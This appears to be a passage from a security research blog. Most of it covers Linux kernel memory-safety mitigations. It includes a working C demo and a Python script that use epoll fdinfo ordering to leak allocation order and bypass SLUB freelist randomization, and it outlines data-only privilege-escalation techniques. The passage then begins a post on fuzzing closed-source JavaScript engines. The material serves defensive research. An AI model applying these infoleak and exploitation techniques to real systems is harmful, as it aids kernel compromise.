A nice example of an attack primitive reduction is the sysctl vm.unprivileged_userfaultfd, which was first introduced so that userfaultfd can be made completely inaccessible to normal users and was then later adjusted so that users can be granted access to part of its functionality without gaining the dangerous attack primitive. (But if you can create unprivileged user namespaces, you can still use FUSE to get an equivalent effect.)

When maintaining lists of allowed syscalls for a sandboxed system component, or something along those lines, it may be a good idea to explicitly track which syscalls are explicitly forbidden for attack primitive reduction reasons, or similarly strong reasons - otherwise one might accidentally end up permitting them in the future. (I guess that's kind of similar to issues that one can run into when maintaining ACLs...)

But like in the previous section, attack primitive reduction also tends to rely on making some functionality unavailable, and so it might not be viable in all situations. For example, newer versions of Android deliberately indirectly give apps access to FUSE through the AppFuse mechanism. (That API doesn't actually give an app direct access to /dev/fuse, but it does forward read/write requests to the app.)

Against oops-based oracles: Lockout or panic on crash

The ability to recover from kernel oopses in an exploit can help an attacker compensate for a lack of information about system state. Under some circumstances, it can even serve as a binary oracle that can be used to more or less perform a binary search for a value, or something like that.

(It used to be even worse on some distributions, where dmesg was accessible for unprivileged users; so if you managed to trigger an oops or WARN, you could then grab the register states at all IRET frames in the kernel stack, which could be used to leak things like kernel pointers. Luckily nowadays most distributions, including Ubuntu 20.10, restrict dmesg access.)

Android and Chrome OS nowadays set the kernel's panic_on_oops flag, meaning the machine will immediately restart when a kernel oops happens. This makes it hard to use oopsing as part of an exploit, and arguably also makes more sense from a reliability standpoint - the system will be down for a bit, and it will lose its existing state, but it will also reset into a known-good state instead of continuing in a potentially half-broken state, especially if the crashing thread was holding mutexes that can never again be released, or things like that. On the other hand, if some service crashes on a desktop system, perhaps that shouldn't cause the whole system to immediately go down and make you lose unsaved state - so panic_on_oops might be too drastic there.

A good solution to this might require a more fine-grained approach. (For example, grsecurity has for a long time had the ability to lock out specific UIDs that have caused crashes.) Perhaps it would make sense to allow the init daemon to use different policies for crashes in different services/sessions/UIDs?

Against UAF access: Deterministic UAF mitigation

One defense that would reliably stop an exploit for this issue would be a deterministic use-after-free mitigation. Such a mitigation would reliably protect the memory formerly occupied by the object from accesses through dangling pointers to the object, at least once the memory has been reused for a different purpose (including reuse to store heap metadata). For write operations, this probably requires either atomicity of the access check and the actual write or an RCU-like delayed freeing mechanism. For simple read operations, it can also be implemented by ordering the access check after the read, but before the read value is used.

A big downside of this approach on its own is that extra checks on every memory access will probably come with an extremely high efficiency penalty, especially if the mitigation can not make any assumptions about what kinds of parallel accesses might be happening to an object, or what semantics pointers have. (The proof-of-concept implementation I presented at LSSNA 2020 (slides, recording) had CPU overhead roughly in the range 60%-159% in kernel-heavy benchmarks, and ~8% for a very userspace-heavy benchmark.)

Unfortunately, even a deterministic use-after-free mitigation often won't be enough to deterministically limit the blast radius of something like a refcounting mistake to the object in which it occurred. Consider a case where two codepaths concurrently operate on the same object: Codepath A assumes that the object is live and subject to normal locking rules. Codepath B knows that the reference count reached zero, assumes that it therefore has exclusive access to the object (meaning all members are mutable without any locking requirements), and is trying to tear down the object. Codepath B might then start dropping references the object was holding on other objects while codepath A is following the same references. This could then lead to use-after-frees on pointed-to objects. If all data structures are subject to the same mitigation, this might not be too much of a problem; but if some data structures (like struct page) are not protected, it might permit a mitigation bypass.

Similar issues apply to data structures with union members that are used in different object states; for example, here's some random kernel data structure with an rcu_head in a union (just a random example, there isn't anything wrong with this code as far as I know):

struct allowedips_node {
    struct wg_peer __rcu *peer;
    struct allowedips_node __rcu *bit[2];
    /* While it may seem scandalous that we waste space for v4,
     * we're alloc'ing to the nearest power of 2 anyway, so this
     * doesn't actually make a difference.
     */
    u8 bits[16] __aligned(__alignof(u64));
    u8 cidr, bit_at_a, bit_at_b, bitlen;

    /* Keep rarely used list at bottom to be beyond cache line. */
    union {
        struct list_head peer_list;
        struct rcu_head rcu;
    };
};

As long as everything is working properly, the peer_list member is only used while the object is live, and the rcu member is only used after the object has been scheduled for delayed freeing; so this code is completely fine. But if a bug somehow caused the peer_list to be read after the rcu member has been initialized, type confusion would result.

In my opinion, this demonstrates that while UAF mitigations do have a lot of value (and would have reliably prevented exploitation of this specific bug), a use-after-free is just one possible consequence of the symptom class "object state confusion" (which may or may not be the same as the bug class of the root cause). It would be even better to enforce rules on object states, and ensure that an object e.g. can't be accessed through a "refcounted" reference anymore after the refcount has reached zero and has logically transitioned into a state like "non-RCU members are exclusively owned by thread performing teardown" or "RCU callback pending, non-RCU members are uninitialized" or "exclusive access to RCU-protected members granted to thread performing teardown, other members are uninitialized". Of course, doing this as a runtime mitigation would be even costlier and messier than a reliable UAF mitigation; this level of protection is probably only realistic with at least some level of annotations and static validation.

Against UAF access: Probabilistic UAF mitigation; pointer leaks

Summary: Some types of probabilistic UAF mitigation break if the attacker can leak information about pointer values; and information about pointer values easily leaks to userspace, e.g. through pointer comparisons in map/set-like structures.

If a deterministic UAF mitigation is too costly, an alternative is to do it probabilistically; for example, by tagging pointers with a small number of bits that are checked against object metadata on access, and then changing that object metadata when objects are freed.

The downside of this approach is that information leaks can be used to break the protection. One example of a type of information leak that I'd like to highlight (without any judgment on the relative importance of this compared to other types of information leaks) are intentional pointer comparisons, which have quite a few facets.

A relatively straightforward example where this could be an issue is the kcmp() syscall. This syscall compares two kernel objects using an arithmetic comparison of their permuted pointers (using a per-boot randomized permutation, see kptr_obfuscate()) and returns the result of the comparison (smaller, equal or greater). This gives userspace a way to order handles to kernel objects (e.g. file descriptors) based on the identities of those kernel objects (e.g. struct file instances), which in turn allows userspace to group a set of such handles by backing kernel object in O(n*log(n)) time using a standard sorting algorithm.

This syscall can be abused for improving the reliability of use-after-free exploits against some struct types because it checks whether two pointers to kernel objects are equal without accessing those objects: An attacker can allocate an object, somehow create a reference to the object that is not counted properly, free the object, reallocate it, and then verify whether the reallocation indeed reused the same address by comparing the dangling reference and a reference to the new object with kcmp(). If kcmp() includes the pointer's tag bits in the comparison, this would likely also permit breaking probabilistic UAF mitigations.

Essentially the same concern applies when a kernel pointer is encrypted and then given to userspace in fuse_lock_owner_id(), which encrypts the pointer to a files_struct with an open-coded version of XTEA before passing it to a FUSE daemon.

In both these cases, explicitly stripping tag bits would be an acceptable workaround because a pointer without tag bits still uniquely identifies a memory location; and given that these are very special interfaces that intentionally expose some degree of information about kernel pointers to userspace, it would be reasonable to adjust this code manually.

A somewhat more interesting example is the behavior of this piece of userspace code:

#define _GNU_SOURCE
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  struct rlimit rlim;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
  rlim.rlim_cur = rlim.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(0, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));

  int epfd = SYSCHK(epoll_create1(0));
  for (int i=0; i<1000; i++)
    SYSCHK(eventfd(0, 0));
  for (int i=0; i<192; i++) {
    int fd = SYSCHK(eventfd(0, 0));
    struct epoll_event event = {
      .events = EPOLLIN,
      .data = { .u64 = i }
    };
    SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event));
  }

  char cmd[100];
  sprintf(cmd, "cat /proc/%d/fdinfo/%d", getpid(), epfd);
  system(cmd);
}

It first creates a ton of eventfds that aren't used. Then it creates a bunch more eventfds and creates epoll watches for them, in creation order, with a monotonically incrementing counter in the "data" field. Afterwards, it asks the kernel to print the current state of the epoll instance, which comes with a list of all registered epoll watches, including the value of the data member (in hex). But how is this list sorted? Here's the result of running that code in a Ubuntu 20.10 VM (truncated, because it's a bit long):

user@ubuntuvm:~/epoll_fdinfo$ ./epoll_fdinfo 
pos:    0
flags:  02
mnt_id: 14
tfd:     1040 events:       19 data:               24  pos:0 ino:2f9a sdev:d
tfd:     1050 events:       19 data:               2e  pos:0 ino:2f9a sdev:d
tfd:     1024 events:       19 data:               14  pos:0 ino:2f9a sdev:d
tfd:     1029 events:       19 data:               19  pos:0 ino:2f9a sdev:d
tfd:     1048 events:       19 data:               2c  pos:0 ino:2f9a sdev:d
tfd:     1042 events:       19 data:               26  pos:0 ino:2f9a sdev:d
tfd:     1026 events:       19 data:               16  pos:0 ino:2f9a sdev:d
tfd:     1033 events:       19 data:               1d  pos:0 ino:2f9a sdev:d
[...]

The data: field here is the loop index we stored in the .data member, formatted as hex. Here is the complete list of the data values in decimal:

36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19, 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110, 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10, 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118, 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81, 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160, 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

While these look sort of random, you can see that the list can be split into blocks of length 32 that consist of shuffled contiguous sequences of numbers:

Block 1 (32 values in range 19-50):
36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19

Block 2 (32 values in range 83-114):
95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110

Block 3 (19 values in range 0-18):
12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10

Block 4 (32 values in range 115-146):
135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118

Block 5 (32 values in range 51-82):
66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81

Block 6 (32 values in range 147-178):
177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160

Block 7 (13 values in range 179-191):
186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

What's going on here becomes clear when you look at the data structures epoll uses internally. ep_insert calls ep_rbtree_insert to insert a struct epitem into a red-black tree (a type of sorted binary tree); and this red-black tree is sorted using a tuple of a struct file * and a file descriptor number:

/* Compare RB tree keys */
static inline int ep_cmp_ffd(struct epoll_filefd *p1,
                             struct epoll_filefd *p2)
{
        return (p1->file > p2->file ? +1:
                (p1->file < p2->file ? -1 : p1->fd - p2->fd));
}

So the values we're seeing have been ordered based on the virtual address of the corresponding struct file; and SLUB allocates struct file from order-1 pages (i.e. pages of size 8 KiB), which can hold 32 objects each:

root@ubuntuvm:/sys/kernel/slab/filp# cat order 
1
root@ubuntuvm:/sys/kernel/slab/filp# cat objs_per_slab 
32
root@ubuntuvm:/sys/kernel/slab/filp# 

This explains the grouping of the numbers we saw: Each block of 32 contiguous values corresponds to an order-1 page that was previously empty and is used by SLUB to allocate objects until it becomes full.

With that knowledge, we can transform those numbers a bit, to show the order in which objects were allocated inside each page (excluding pages for which we haven't seen all allocations):

$ cat slub_demo.py 
#!/usr/bin/env python3
blocks = [
  [ 36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19 ],
  [ 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110 ],
  [ 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10 ],
  [ 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118 ],
  [ 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81 ],
  [ 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160 ],
  [ 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184 ]
]

for alloc_indices in blocks:
  if len(alloc_indices) != 32:
    continue
  # indices of allocations ('data'), sorted by memory location, shifted to be relative to the block
  alloc_indices_relative = [position - min(alloc_indices) for position in alloc_indices]
  # reverse mapping: memory locations of allocations,
  # sorted by index of allocation ('data').
  # if we've observed all allocations in a page,
  # these will really be indices into the page.
  memory_location_by_index = [alloc_indices_relative.index(idx) for idx in range(0, len(alloc_indices))]
  print(memory_location_by_index)
$ ./slub_demo.py 
[31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17]
[16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14]
[23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27]
[20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2]
[5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15]

And these sequences are almost the same, except that they have been rotated around by different amounts. This is exactly the SLUB freelist randomization scheme, as introduced in commit 210e7a43fa905!

When a SLUB kmem_cache is created (an instance of the SLUB allocator for a specific size class and potentially other specific attributes, usually initialized at boot time), init_cache_random_seq and cache_random_seq_create fill an array ->random_seq with randomly-ordered object indices via Fisher-Yates shuffle, with the array length equal to the number of objects that fit into a page. Then, whenever SLUB grabs a new page from the lower-level page allocator, it initializes the page freelist using the indices from ->random_seq, starting at a random index in the array (and wrapping around when the end is reached). (I'm ignoring the low-order allocation fallback here.)

So in summary, we can bypass SLUB randomization for the slab from which struct file is allocated because someone used it as a lookup key in a specific type of data structure. This is already fairly undesirable if SLUB randomization is supposed to provide protection against some types of local attacks for all slabs.

The heap-randomization-weakening effect of such data structures is not necessarily limited to cases where elements of the data structure can be listed in-order by userspace: If there was a codepath that iterated through the tree in-order and freed all tree nodes, that could have a similar effect, because the objects would be placed on the allocator's freelist sorted by address, cancelling out the randomization. In addition, you might be able to leak information about iteration order through cache side channels or such.

If we introduce a probabilistic use-after-free mitigation that relies on attackers not being able to learn whether the uppermost bits of an object's address changed after it was reallocated, this data structure could also break that. This case is messier than things like kcmp() because here the address ordering leak stems from a standard data structure.

You may have noticed that some of the examples I'm using here would be more or less limited to cases where an attacker is reallocating memory with the same type as the old allocation, while a typical use-after-free attack ends up replacing an object with a differently-typed one to cause type confusion. As an example of a bug that can be exploited for privilege escalation without type confusion at the C structure level, see entry 808 in our bugtracker. My exploit for that bug first starts a writev() operation on a writable file, lets the kernel validate that the file is indeed writable, then replaces the struct file with a read-only file pointing to /etc/crontab, and lets writev() continue. This allows gaining root privileges through a use-after-free bug without having to mess around with kernel pointers, data structure layouts, ROP, or anything like that. Of course that approach doesn't work with every use-after-free though.

(By the way: For an example of pointer leaks through container data structures in a JavaScript engine, see this bug I reported to Firefox back in 2016, when I wasn't a Google employee, which leaks the low 32 bits of a pointer by timing operations on pessimal hash tables - basically turning the HashDoS attack into an infoleak. Of course, nowadays, a side-channel-based pointer leak in a JS engine would probably not be worth treating as a security bug anymore, since you can probably get the same result with Spectre...)

Against freeing SLUB pages: Preventing virtual address reuse beyond the slab

(Also discussed a little bit on the kernel-hardening list in this thread.)

A weaker but less CPU-intensive alternative to trying to provide complete use-after-free protection for individual objects would be to ensure that virtual addresses that have been used for slab memory are never reused outside the slab, but that physical pages can still be reused. This would be the same basic approach as used by PartitionAlloc and others. In kernel terms, that would essentially mean serving SLUB allocations from vmalloc space.

Some challenges I can think of with this approach are:

  • SLUB allocations are currently served from the linear mapping, which normally uses hugepages; if vmalloc mappings with 4K PTEs were used instead, TLB pressure might increase, which might lead to some performance degradation.
  • To be able to use SLUB allocations in contexts that operate directly on physical memory, it is sometimes necessary for SLUB pages to be physically contiguous. That's not really a problem, but it is different from default vmalloc behavior. (Sidenote: DMA buffers don't always have to be physically contiguous - if you have an IOMMU, you can use that to map discontiguous pages to a contiguous DMA address range, just like how normal page tables create virtually-contiguous memory. See this kernel-internal API for an example that makes use of this, and Fuchsia's documentation for a high-level overview of how all this works in general.)
  • Some parts of the kernel convert back and forth between virtual addresses, struct page pointers, and (for interaction with hardware) physical addresses. This is a relatively straightforward mapping for addresses in the linear mapping, but would become a bit more complicated for vmalloc addresses. In particular, page_to_virt() and phys_to_virt() would have to be adjusted.
    • This is probably also going to be an issue for things like Memory Tagging, since pointer tags will have to be reconstructed when converting back to a virtual address. Perhaps it would make sense to forbid these helpers outside low-level memory management, and change existing users to instead keep a normal pointer to the allocation around? Or maybe you could let pointers to struct page carry the tag bits for the corresponding virtual address in unused/ignored address bits?

The probability that this defense can prevent UAFs from leading to exploitable type confusion depends somewhat on the granularity of slabs; if specific struct types have their own slabs, it provides more protection than if objects are only grouped by size. So to improve the utility of virtually-backed slab memory, it would be necessary to replace the generic kmalloc slabs (which contain various objects, grouped only by size) with ones that are segregated by type and/or allocation site. (The grsecurity/PaX folks have vaguely alluded to doing something roughly along these lines using compiler instrumentation.)

After reallocation as pagetable: Structure layout randomization

Memory safety issues are often exploited in a way that involves creating a type confusion; e.g. exploiting a use-after-free by replacing the freed object with a new object of a different type.

A defense that first appeared in grsecurity/PaX is to shuffle the order of struct members at build time to make it harder to exploit type confusions involving structs; the upstream Linux version of this is in scripts/gcc-plugins/randomize_layout_plugin.c.

How effective this is depends partly on whether the attacker is forced to exploit the issue as a confusion between two structs, or whether the attacker can instead exploit it as a confusion between a struct and an array (e.g. containing characters, pointers or PTEs). Especially if only a single struct member is accessed, a struct-array confusion might still be viable by spraying the entire array with identical elements. Against the type confusion described in this blogpost (between struct pid and page table entries), structure layout randomization could still be somewhat effective, since the reference count is half the size of a PTE and therefore can randomly be placed to overlap either the lower or the upper half of a PTE. (Except that the upstream Linux version of randstruct only randomizes explicitly-marked structs or structs containing only function pointers, and struct pid has no such marking.)

Of course, drawing a clear distinction between structs and arrays oversimplifies things a bit; for example, there might be struct types that have a large number of pointers of the same type or attacker-controlled values, not unlike an array.

If the attacker can not completely sidestep structure layout randomization by spraying the entire struct, the level of protection depends on how kernel builds are distributed:

  • If the builds are created centrally by one vendor and distributed to a large number of users, an attacker who wants to be able to compromise users of this vendor would have to rework their exploit to use a different type confusion for each release, which may force the attacker to rewrite significant chunks of the exploit.
  • If the kernel is individually built per machine (or similar), and the kernel image is kept secret, an attacker who wants to reliably exploit a target system may be forced to somehow leak information about some structure layouts and either prepare exploits for many different possible struct layouts in advance or write parts of the exploit interactively after leaking information from the target system.

To maximize the benefit of structure layout randomization in an environment where kernels are built centrally by a distribution/vendor, it would be necessary to make randomization a boot-time process by making structure offsets relocatable. (Or install-time, but that would break code signing.) Doing this cleanly (for example, such that 8-bit and 16-bit immediate displacements can still be used for struct member access where possible) would probably require a lot of fiddling with compiler internals, from the C frontend all the way to the emission of relocations. A somewhat hacky version of this approach already exists for C->BPF compilation as BPF CO-RE, using the clang builtin __builtin_preserve_access_index, but that relies on debuginfo, which probably isn't a very clean approach.

Potential issues with structure layout randomization are:

  • If structures are hand-crafted to be particularly cache-efficient, fully randomizing structure layout could worsen cache behavior. The existing randstruct implementation optionally avoids this by trying to randomize only within a cache line.
  • Unless the randomization is applied in a way that is reflected in DWARF debug info and such (which it isn't in the existing GCC-based implementation), it can make debugging and introspection harder.
  • It can break code that makes assumptions about structure layout; but such code is gross and should be cleaned up anyway (and Gustavo Silva has been working on fixing some of those issues).

While structure layout randomization by itself is limited in its effectiveness by struct-array confusions, it might be more reliable in combination with limited heap partitioning: If the heap is partitioned such that only struct-struct confusion is possible, and structure layout randomization makes struct-struct confusion difficult to exploit, and no struct in the same heap partition has array-like properties, then it would probably become much harder to directly exploit a UAF as type confusion. On the other hand, if the heap is already partitioned like that, it might make more sense to go all the way with heap partitioning and create one partition per type instead of dealing with all the hassle of structure layout randomization.

(By the way, if structure layouts are randomized, padding should probably also be randomized explicitly instead of always being on the same side to maximally randomize structure members with low alignment; see my list post on this topic for details.)

Control Flow Integrity

I want to explicitly point out that kernel Control Flow Integrity would have had no impact at all on this exploit strategy. By using a data-only strategy, we avoid having to leak addresses, avoid having to find ROP gadgets for a specific kernel build, and are completely unaffected by any defenses that attempt to protect kernel code or kernel control flow. Things like getting access to arbitrary files, increasing the privileges of a process, and so on don't require kernel instruction pointer control.

Like in my last blogpost on Linux kernel exploitation (which was about a buggy subsystem that an Android vendor added to their downstream kernel), to me, a data-only approach to exploitation feels very natural and seems less messy than trying to hijack control flow anyway.

Maybe things are different for userspace code; but for attacks by userspace against the kernel, I don't currently see a lot of utility in CFI because it typically only affects one of many possible methods for exploiting a bug. (Although of course there could be specific cases where a bug can only be exploited by hijacking control flow, e.g. if a type confusion only permits overwriting a function pointer and none of the permitted callees make assumptions about input types or privileges that could be broken by changing the function pointer.)

Making important data readonly

A defense idea that has shown up in a bunch of places (including Samsung phone kernels and XNU kernels for iOS) is to make data that is crucial to kernel security read-only except when it is intentionally being written to - the idea being that even if an attacker has an arbitrary memory write, they should not be able to directly overwrite specific pieces of data that are of exceptionally high importance to system security, such as credential structures, page tables, or (on iOS, using PPL) userspace code pages.

The problem I see with this approach is that a large portion of the things a kernel does are, in some way, critical to the correct functioning of the system and system security. MMU state management, task scheduling, memory allocation, filesystems, page cache, IPC, ... - if any one of these parts of the kernel is corrupted sufficiently badly, an attacker will probably be able to gain access to all user data on the system, or use that corruption to feed bogus inputs into one of the subsystems whose own data structures are read-only.

In my view, instead of trying to split out the most critical parts of the kernel and run them in a context with higher privileges, it might be more productive to go in the opposite direction and try to approximate something like a proper microkernel: Split out drivers that don't strictly need to be in the kernel and run them in a lower-privileged context that interacts with the core kernel through proper APIs. Of course that's easier said than done! But Linux does already have APIs for safely accessing PCI devices (VFIO) and USB devices from userspace, although userspace drivers aren't exactly its main usecase.

(One might also consider making page tables read-only not because of their importance to system integrity, but because the structure of page table entries makes them nicer to work with in exploits that are constrained in what modifications they can make to memory. I dislike this approach because I think it has no clear conclusion and it is highly invasive regarding how data structures can be laid out.)

Conclusion

This was essentially a boring locking bug in some random kernel subsystem that, if it wasn't for memory unsafety, shouldn't really have much of a relevance to system security. I wrote a fairly straightforward, unexciting (and admittedly unreliable) exploit against this bug; and probably the biggest challenge I encountered when trying to exploit it on Debian was to properly understand how the SLUB allocator works.

My intent in describing the exploit stages, and how different mitigations might affect them, is to highlight that the further a memory corruption exploit progresses, the more options an attacker gains; and so as a general rule, the earlier an exploit is stopped, the more reliable the defense is. Therefore, even if defenses that stop an exploit at an earlier point have higher overhead, they might still be more useful.

I think that the current situation of software security could be dramatically improved - in a world where a little bug in some random kernel subsystem can lead to a full system compromise, the kernel can't provide reliable security isolation. Security engineers should be able to focus on things like buggy permission checks and core memory management correctness, and not have to spend their time dealing with issues in code that ought to not have any relevance to system security.

In the short term, there are some band-aid mitigations that could be used to improve the situation - like heap partitioning or fine-grained UAF mitigation. These might come with some performance cost, and that might make them look unattractive; but I still think that they're a better place to invest development time than things like CFI, which attempts to protect against much later stages of exploitation.

In the long term, I think something has to change about the programming language - plain C is simply too error-prone. Maybe the answer is Rust; or maybe the answer is to introduce enough annotations to C (along the lines of Microsoft's Checked C project, although as far as I can see they mostly focus on things like array bounds rather than temporal issues) to allow Rust-equivalent build-time verification of locking rules, object states, refcounting, void pointer casts, and so on. Or maybe another completely different memory-safe language will become popular in the end, neither C nor Rust?

My hope is that perhaps in the mid-term future, we could have a statically verified, high-performance core of kernel code working together with instrumented, runtime-verified, non-performance-critical legacy code, such that developers can make a tradeoff between investing time into backfilling correct annotations and run-time instrumentation slowdown without compromising on security either way.

TL;DR

memory corruption is a big problem because small bugs even outside security-related code can lead to a complete system compromise; and to address that, it is important that we:

  • in the short to medium term:

    • design new memory safety mitigations:
      • ideally, that can stop attacks at an early point where attackers don't have a lot of alternate options yet
        • maybe at the memory allocator level (i.e. SLUB)
      • that can't be broken using address tag leaks (or we try to prevent tag leaks, but that's really hard)
    • continue using attack surface reduction
      • in particular seccomp
    • explicitly prevent untrusted code from gaining important attack primitives
      • like FUSE, and potentially consider fine-grained scheduler control
  • in the long term:

    • statically verify correctness of most performance-critical code
      • this will require determining how to retrofit annotations for object state and locking onto legacy C code
      • consider designing runtime verification just for gaps in static verification

Fuzzing Closed-Source JavaScript Engines with Coverage Feedback

Posted by Ivan Fratric, Project Zero

tl;dr I combined Fuzzilli (an open-source JavaScript engine fuzzer), with TinyInst (an open-source dynamic instrumentation library for fuzzing). I also added grammar-based mutation support to Jackalope (my black-box binary fuzzer). So far, these two approaches resulted in finding three security issues in jscript9.dll (default JavaScript engine used by Internet Explorer).

Introduction or “when you can’t beat them, join them”

In the past, I’ve invested a lot of time in generation-based fuzzing, which was a successful way to find vulnerabilities in various targets, especially those that take some form of language as input. For example, Domato, my grammar-based generational fuzzer, found over 40 vulnerabilities in WebKit and numerous bugs in Jscript. 

While generation-based fuzzing is still a good way to fuzz many complex targets, it was demonstrated that, for finding vulnerabilities in modern JavaScript engines, especially engines with JIT compilers, better results can be achieved with mutational, coverage-guided approaches. My colleague Samuel Groß gives a compelling case on why that is in his OffensiveCon talk. Samuel is also the author of Fuzzilli, an open-source JavaScript engine fuzzer based on mutating a custom intermediate language. Fuzzilli has found a large number of bugs in various JavaScript engines.

While there has been a lot of development on coverage-guided fuzzers over the last few years, most of the public tooling focuses on open-source targets or software running on the Linux operating system. Meanwhile, I focused on developing tooling for fuzzing of closed-source binaries on operating systems where such software is more prevalent (currently Windows and macOS). Some years back, I published WinAFL, the first performant AFL-based fuzzer for Windows. About a year and a half ago, however, I started working on a brand new toolset for black-box coverage-guided fuzzing. TinyInst and Jackalope are the two outcomes of this effort.

It comes somewhat naturally to combine the tooling I’ve been working on with techniques that have been so successful in finding JavaScript bugs, and try to use the resulting tooling to fuzz JavaScript engines for which the source code is not available. Of such engines, I know two: jscript and jscript9 (implemented in jscript.dll and jscript9.dll) on Windows, which are both used by the Internet Explorer web browser. Of these two, jscript9 is probably more interesting in the context of mutational coverage-guided fuzzing since it includes a JIT compiler and more advanced engine features.

While you might think that Internet Explorer is a thing of the past and it doesn’t make sense to spend energy looking for bugs in it, the fact remains that Internet Explorer is still heavily exploited by real-world attackers. In 2020 there were two Internet Explorer 0days exploited in the wild and three in 2021 so far. One of these vulnerabilities was in the JIT compiler of jscript9. I’ve personally vowed several times that I’m done looking into Internet Explorer, but each time, more 0days in the wild pop up and I change my mind.

Additionally, the techniques described here could be applied to any closed-source or even open-source software, not just Internet Explorer. In particular, grammar-based mutational fuzzing described two sections down can be applied to targets other than JavaScript engines by simply changing the input grammar.

Approach 1: Fuzzilli + TinyInst

Fuzzilli, as said above, is a state-of-the-art JavaScript engine fuzzer and TinyInst is a dynamic instrumentation library. Although TinyInst is general-purpose and could be used in other applications, it comes with various features useful for fuzzing, such as out-of-the-box support for persistent fuzzing, various types of coverage instrumentations etc. TinyInst is meant to be simple to integrate with other software, in particular fuzzers, and has already been integrated with some.

So, integrating with Fuzzilli was meant to be simple. However, there were still various challenges to overcome for different reasons:

Challenge 1: Getting Fuzzilli to build on Windows where our targets are.

Edit 2021-09-20: The version of Swift for Windows used in this project was from January 2021, when I first started working on it. Since version 5.4, Swift Package Manager is supported on Windows, so building Swift code should be much easier now. Additionally, static linking is supported for C/C++ code.

Fuzzilli was written in Swift and the support for Swift on Windows is currently not great. While Swift on Windows builds exist (I’m linking to the builds by Saleem Abdulrasool instead of the official ones because the latter didn’t work for me), not all features that you would find on Linux and macOS are there. For example, one does not simply run swift build on Windows, as the build system is one of the features that didn’t get ported (yet). Fortunately, CMake and Ninja  support Swift, so the solution to this problem is to switch to the CMake build system. There are helpful examples on how to do this, once again from Saleem Abdulrasool.

